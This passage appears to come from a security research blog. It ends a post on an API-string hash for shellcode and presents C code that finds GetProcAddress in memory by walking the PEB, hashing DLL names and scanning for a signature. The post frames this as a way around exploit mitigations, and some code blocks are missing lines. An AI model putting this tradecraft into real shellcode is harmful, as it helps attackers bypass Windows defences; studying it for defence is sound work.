      if (idx == MARU_BLK_LEN) {
        // update H with E
        h.q ^= E(&h, &m);
        idx = 0;
    return h.q;

Maru 2

Here, we use a 64-bit seed. The 128-bit result is stored in out parameter.

void maru2(const char *key, uint64_t seed, void *out) 
    w128_t  h, c;
    w256_t  m;
    int     len, idx, end;

    // initialize H with seed
    h.q[0] = MARU2_INIT_B ^ seed;
    h.q[1] = MARU2_INIT_D ^ seed;
    for (idx=0, len=0, end=0; !end; ) {
      // end of string or max len?
      if (key[len]==0 || len==MARU2_KEY_LEN) {
        // add end bit
        m.b[idx++] = 0x80;
        // zero remainder of M
        memset (&m.b[idx], 0, (MARU2_BLK_LEN - idx));
        // have we space in M for len?
        if (idx >= MARU2_BLK_LEN-4) {
          // no, encrypt H
          E(&h, &m, &c);
          // update H
          h.q[0] ^= c.q[0];
          h.q[1] ^= c.q[1];          
          // zero M
          memset (m.b, 0, MARU2_BLK_LEN);
        // add total len in bits
        m.w[(MARU2_BLK_LEN/4)-1] = (len * 8);
        idx = MARU2_BLK_LEN;
      } else {    
        // add byte to M
        m.b[idx++] = (uint8_t)key[len++];
      if (idx == MARU2_BLK_LEN) {
        // encrypt H
        E(&h, &m, &c);
        // update H
        h.q[0] ^= c.q[0];
        h.q[1] ^= c.q[1];
        idx = 0;
    memcpy(out, &h, sizeof(h));    


Both versions performed well when tested with Robert G. Brown’s dieharder tool.

The tests involved setting a string buffer to all 1s and incrementing sequentially to generate hashes, similar to how one might test a PRNG.

  • Maru 1

  • Maru 2

Of course, just because the hash output passed dieharder tests, that doesn’t necessarily mean we have a good hash function, but it’s at the very least a good sign.

Example Hashes

  • Maru 1

  • Maru 2

As you can see above, once the seed value is changed, the hash output also changes.


We can construct better hashing algorithms for API strings from block ciphers. Maru isn’t intended for digital signatures or mission critical applications that requires robust collision resistant hashing functions, but it is good enough for hashing short strings like API.

Maru is really an idea about how to introduce entropy into the string hashing process, while trying to increase difficulty of string collisions.

You can see full source for Maru hash here.

About Maru the cat

Posted in assembly, programming, shellcode, windows | Tagged , , , , , | Leave a comment

Shellcode: The hunt for GetProcAddress


Recently revealed by Alex Ionescu, future releases of Windows will include Enhanced Mitigation Experience Toolkit (EMET) built into the kernel.

As more mitigation features appear in MSVC and the Windows operating system, the difficulty of locating API to exploit memory corruption vulnerabilities increases.

It got me thinking; If both the Import Address Table (IAT) and Export Address Table (EAT) are unavailable, what other ways can we resolve GetProcAddress for a Position Independent Code (PIC) ?

Surely there must be other ways?

What you see here is just some hours work and not extensive research into obtaining GPA when the IAT and EAT are inaccessible.

I don’t know how practical this idea would be in a real world scenario, but thought it was worth a quick post which might encourage others to find some alternatives.

Signature Detection

Every algorithm used to detect malware can be repurposed to detect arbitrary code including that of GetProcAddress.

Detection of malicious code can range from simple searching of strings, constants (including crypto) or sequences of code bytes to more advanced methods like emulation and statistical analysis.

Locating GetProcAddress by signature is trivial because it’s the only API that will return the error code: STATUS_ORDINAL_NOT_FOUND

From Windows NT up to Windows 10, there’s a high probability simply searching either kernel32.dll or kernelbase.dll for a function with this constant is enough to locate the entry point of GetProcAddress.

Search algorithm

Some pseudocode to describe search pattern:

for each DLL in PEB
  for each executable section in DLL
    scan forward in memory for STATUS_ORDINAL_NOT_FOUND
    if constant found
      scan backward in memory for prolog bytes
        if bytes found
        end if
    end if
  end for
end for

Simple enough in theory and for 32-bit legacy mode is effective.

However, it’s ineffective if GetProcAddress uses function chunking thus will not work for some DLL (specifically 64-bit versions).

On Windows 7, the location of our constant in kernelbase.dll appears inside a chunk of code.

Negating 0x3FFFFEC8 gives us 0xC0000138

On Windows 10, the location of constant is within the same GetProcAddress code thus entrypoint can be easily located via simple search.

To work with Win7, I would suggest a Length Disassembler Engine (LDE) in addition to emulating the relative jumps until you land in GetProcAddress again, but there are no LDE for 64-bit I know which would operate independently of memory. Maybe one isn’t needed?

Since we’re searching the sections of kernel32.dll or kernelbase.dll, let’s examine the PEs section header structure and what members we’re interested in.

typedef struct _IMAGE_SECTION_HEADER {
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;
  DWORD SizeOfRawData;
  DWORD PointerToRawData;
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
  • Misc.VirtualSize

The total size of the section when loaded into memory, in bytes. If this value is greater than the SizeOfRawData member, the section is filled with zeroes. This field is valid only for executable images and should be set to 0 for object files.

  • VirtualAddress

The address of the first byte of the section when loaded into memory, relative to the image base. For object files, this is the address of the first byte before relocation is applied.

  • Characteristics

The characteristics of the image. Since we’re looking for executable code, we can test this value for IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE

Once we find an executable section, we perform a simple search for our signature, which in this case would be 4-byte sequence: 0x38, 0x01, 0x00, 0xC0

If found, we presume we’re in GetProcAddress code so we scan back in memory to find the prolog bytes which for 32-bit will be 0x55, 0x8B, 0xEC and 0x48, 0x89, 0x5C, 0x24, 0x08 for 64-bit.

// 32-bit prolog
"\x55"             /* push ebp           */
"\x8b\xec"         /* mov ebp, esp       */

Even though most 32-bit APIs since XP SP2 have a mov edi, edi instruction before the prolog, which is intended for hotpatching, in most cases we can skip it without any consequences.

// 64-bit prolog
"\x48\x89\x5c\x24\x08" /* mov [rsp+0x8], rbx */

Another potential way to find the entry point on 64-bit once we’ve found the signature is to look for padding added by the compiler. (some compilers differ in what padding is used)

Functions are aligned on a 16-byte boundary; padding is used before and after GetProcAddress.

On Windows 7, 0x90 is used, which is the x86 opcode for No operation (NOP)

On Windows 10, 0xCC is used, which is the opcode for a software interrupt (INT3)

This may be useful for searching with a different algorithm which is the only reason I mention it.

C code

For each DLL in the Process Environment Block (PEB)
Find either kernel32.dll or kernelbase.dll

LPVOID get_gpa (VOID)
  PPEB                  peb;
  PPEB_LDR_DATA         ldr;
  LPVOID                api_adr=NULL;
  DWORD                 i, h;
  BYTE                  c;
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
  peb = (PPEB) __readfsdword(0x30);

  ldr = (PPEB_LDR_DATA)peb->Ldr;
  // for each DLL loaded
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && api_adr == NULL; 
    // is this kernel32.dll or kernelbase.dll?
    for (h=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      c = dte->BaseDllName.Buffer[i];
      h += (c | 0x20);
      h = ROTR32(h, 13);
    if (h != 0xB1FC7F66 && h!= 0x22901A8D) continue;
    api_adr = scan_img(dte->DllBase); 
    if (api_adr != NULL) {
      printf ("\nGetProcAddress: %p", api_adr);
      printf ("\nGetProcAddress: %p\n", 
        GetProcAddress(dte->DllBase, "GetProcAddress"));      
  return api_adr;

For each executable section of this DLL

/**
 * Scan every executable section of a loaded PE image for the
 * GetProcAddress entry point.
 *
 * base : base address of the image in memory
 *
 * Returns the first non-NULL result of scan_section(), or NULL when
 * no executable section produced a match.
 */
LPVOID scan_img (LPVOID base)
{
  PIMAGE_DOS_HEADER     dos;
  PIMAGE_NT_HEADERS     nt;
  PIMAGE_SECTION_HEADER sec;
  BOOL                  is32;
  PBYTE                 pRawData;
  DWORD                 i, len;
  LPVOID                gpa=NULL;

  dos  = (PIMAGE_DOS_HEADER)base;
  nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
  // the section table starts right after the optional header
  sec  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
          nt->FileHeader.SizeOfOptionalHeader);
  // the machine type selects which prolog bytes scan_section looks for
  is32 = nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386;
  len  = nt->FileHeader.NumberOfSections;

  // for each section, stopping as soon as an address is found
  for (i=0; i<len && gpa == NULL; i++) {
    // is it executable?
    if (sec[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) {
      pRawData = RVA2VA (PBYTE, base, sec[i].VirtualAddress);
      gpa = scan_section (pRawData, sec[i].Misc.VirtualSize, is32);
    }
  }
  return gpa;
}

Find the signature and scan backwards for the prolog bytes.

/**
 * Search a block of code for the 4-byte signature 38 01 00 C0 and,
 * once found, scan backwards for the function prolog bytes.
 *
 * memory : start of the section in memory
 * len    : size of the section in bytes
 * is32   : TRUE to look for the 32-bit prolog, FALSE for the 64-bit one
 *
 * Returns the address of the nearest prolog preceding the first
 * signature that has one, or NULL if nothing matched.
 */
LPVOID scan_section (PBYTE memory, DWORD len, BOOL is32)
{
  DWORD  i, j, plen;
  LPVOID ofs = NULL;
  // 4-byte signature
  BYTE   sig[] = { 0x38, 0x01, 0x00, 0xC0 };
  // 3-byte prolog for 32-bit: push ebp / mov ebp, esp
  BYTE   x32[] = { 0x55, 0x8B, 0xEC };
  // 4-byte prolog for 64-bit: first four bytes of mov [rsp+0x8], rbx
  BYTE   x64[] = { 0x48, 0x89, 0x5C, 0x24 };
  PBYTE  prolog, p;

  p      = memory;
  plen   = is32 ? sizeof(x32) : sizeof(x64);
  prolog = is32 ? x32 : x64;

  if (len <= sizeof(sig)) return NULL;
  // subtract size of signature
  // so we don't cause an exception
  len -= sizeof(sig);

  for (i=0; i<len && ofs == NULL; i++) {
    // compare signature with current position
    if (memcmp(sig, &p[i], sizeof(sig)) != 0) continue;

    // try scanning backwards for prolog bytes, from i down to 0.
    // j is unsigned, so "j >= 0" would never be false and j would wrap
    // below zero; count down with a post-decrement test instead.
    for (j=i+1; j-- > 0; ) {
      // found prolog bytes?
      if (memcmp(prolog, &p[j], plen)==0) {
        // return address
        ofs = (LPVOID)&p[j];
        break;
      }
    }
  }
  return ofs;
}


Does it work? For the majority of 32-bit versions of Windows, it works fine because the STATUS_ORDINAL_NOT_FOUND constant lies between the prolog and epilog of the GetProcAddress code. Where it doesn’t work is on Windows 7 64-bit, because there the constant lies outside that range.

  • Windows 7 32-bit
  • (good!)

The 1st address is off by 2-bytes, but that’s the MOV EDI, EDI instruction used for hotpatching and can be safely skipped over.

  • Windows 7 64-bit
  • (bad..)

  • Windows 10 64-bit
  • (good!)

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 3 Comments